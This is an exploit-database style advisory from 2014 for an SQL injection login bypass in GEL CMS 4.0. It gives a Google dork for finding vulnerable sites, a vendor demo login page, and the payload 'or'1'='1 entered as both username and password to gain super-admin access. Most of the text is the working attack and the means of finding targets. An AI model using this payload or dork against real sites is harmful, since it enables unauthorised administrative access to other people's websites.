facebook facebook twitter rss

SQLi Bypass super-admin GEL CMS 4.0

Author: Guillermo Garcia Marcos , Published: 14-08-2014
ad8888888888ba           Bypass super-Admin GEL4.0
dP' `"8b,
8 ,aaa, "Y888a ,aaaa, ,aaa, ,aa,
8 8' `8 "8baaaad""""baaaad""""baad""8b
8 8 8 """" """" "" 8b
8 8, ,8 ,aaaaaaaaaaaaaaaaaaaaaaaaddddd88P
8 `"""' ,d8""
Yb, ,ad8"
"Y8888888888P"


# Exploit Title: SQLi Bypass super-admin GEL CMS 4.0
# Google Dork: inurl:/contact-us_id7.php
# Date: 11 August 2014
# Exploit Author: Guillermo Garcia Marcos @GuilleSec
# Severity: High
# Vendor Homepage: http://www.oklahoma-website-design.com/
# Software Link: http://www.oklahoma-website-design.com/
# Versions: 4.00 and latest versions.
# Tested on: Debian (Apache+MySQL)

DEMO: http://www.oklahoma-website-design.com/login.php

Loginpanel:

domain.lol/login.php

SQL string:

Username: 'or'1'='1
Password: 'or'1'='1

Like us on Facebook :